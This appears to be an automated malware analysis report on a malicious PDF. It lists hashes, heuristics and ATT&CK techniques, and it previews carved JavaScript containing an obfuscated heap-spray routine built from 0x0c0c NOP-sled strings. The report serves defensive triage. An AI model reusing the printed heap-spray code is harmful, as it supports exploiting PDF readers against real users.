Malicious PDF — malware analysis report

Static analysis result for SHA-256 dd227eb5bb15ff1b…

Verdict: MALICIOUS
File type: PDF
Size: 61.6 KB
First seen: 2026-05-10
MD5: 3513574cf80f304d1d29d458eba399e0
SHA-1: 68ebb0dcb7d10b864b49ff83ece4c27986f11351
SHA-256: dd227eb5bb15ff1b041a891f4de839d5eb1f9a5e2b0a1ec5ea5c7190018df0aa
Risk score: 78

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1204.002 Malicious File

The PDF file contains embedded JavaScript, flagged by the PDF_JAVASCRIPT and PDF_JS heuristics. An ASCIIHexDecode filter appearing alongside exploit indicators suggests the hex encoding is being used to obscure malicious content. The document body itself is unreadable, so the embedded JavaScript is the primary attack mechanism. The extracted URLs are XFA schema namespace identifiers rather than detections in their own right; XFA forms are a frequent target for exploitation.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics (6)

  • ASCIIHexDecode filter (with exploit indicators) [medium] PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes.
  • JavaScript action [low, 1 related finding] PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream [low] PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form [low] PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • http://ns.adobe.com/xdp/ (referenced by PDF JavaScript)
      • http://www.xfa.org/schema/xci/2.6/ (referenced by PDF JavaScript)
      • http://www.xfa.org/schema/xfa-template/2.6/ (referenced by PDF JavaScript)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0012_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 12 at offset 0xE3EC
Size: 3831 bytes
SHA-256: 55c5ed1db34532c6a53a265f77213b8061670a609a15892a865b5e45e3d477d9
Detection (ClamAV): No threats found
Obfuscation or payload: likely
  6 of 10 identifiers look randomly generated (e.g. 'kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePd') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var hDVCURdDaCqCmPAmpTsHTCNuiugQyjzLcsmWuxraRkHylRIraWGOWvxgKPAzgaX = unescape;
var WKEPB = hDVCURdDaCqCmPAmpTsHTCNuiugQyjzLcsmWuxraRkHylRIraWGOWvxgKPAzgaX( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (WKEPB.length + 20 + 8 < 65536) WKEPB+=WKEPB;
prgjeqZElNOcVNjjJUrTxJvudoYTtlHlqoCMGImbuHLYbWKjMOKmmBtFgfgp = WKEPB.substring(0, (0x0c0c-0x24)/2);
prgjeqZElNOcVNjjJUrTxJvudoYTtlHlqoCMGImbuHLYbWKjMOKmmBtFgfgp += weSWVZLQqxfESiRCjjkAGRYcUrobENItbetEqXtfORjQcJAYQZVxETOaklKOIcMYGnpoqDaGgJUmJg;
prgjeqZElNOcVNjjJUrTxJvudoYTtlHlqoCMGImbuHLYbWKjMOKmmBtFgfgp += WKEPB;
kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb = prgjeqZElNOcVNjjJUrTxJvudoYTtlHlqoCMGImbuHLYbWKjMOKmmBtFgfgp.substring(0, 65536/2);
while(kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb.length < 0x80000) kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb += kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb;
Q = kkYMTEQmQONYpOlLGZuDpVodfEPGtFwCUlpKLePdFsZEYXasRVEqRkDBDDwOqCknkWpiZHbkfumVUuMUvPVPKukirOsBQUb.substring(0, 0x80000 - (0x1020-0x08) / 2);
var AgbLCdSipAzWlhOvBCNlQNkJRpaEJjLVaAiDqHVHxMrkWUEUHerUwwFfxTcrIwALanslrxaNI = new Array();
for (dtvTGdvXcGEIJszbhoYpMKwLxCjyJNTKRCYGjaYsFeBrbwMbNFhbxAAOOaTUGaXSkJWOYStUkY=0;dtvTGdvXcGEIJszbhoYpMKwLxCjyJNTKRCYGjaYsFeBrbwMbNFhbxAAOOaTUGaXSkJWOYStUkY<0x1f0;dtvTGdvXcGEIJszbhoYpMKwLxCjyJNTKRCYGjaYsFeBrbwMbNFhbxAAOOaTUGaXSkJWOYStUkY++) AgbLCdSipAzWlhOvBCNlQNkJRpaEJjLVaAiDqHVHxMrkWUEUHerUwwFfxTcrIwALanslrxaNI[dtvTGdvXcGEIJszbhoYpMKwLxCjyJNTKRCYGjaYsFeBrbwMbNFhbxAAOOaTUGaXSkJWOYStUkY]=Q+"s";
Filename: javascript_obj0012_001.js
Kind: pdf-javascript-stream
Source: PDF /JS object 12 at offset 0xE40E
Size: 4717 bytes
SHA-256: ddfe4ff7b3616b26457b741e48b197373e0c9e9dc48d439e62bfac1e60e57d19
Preview script
First 1,000 lines of the extracted script

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj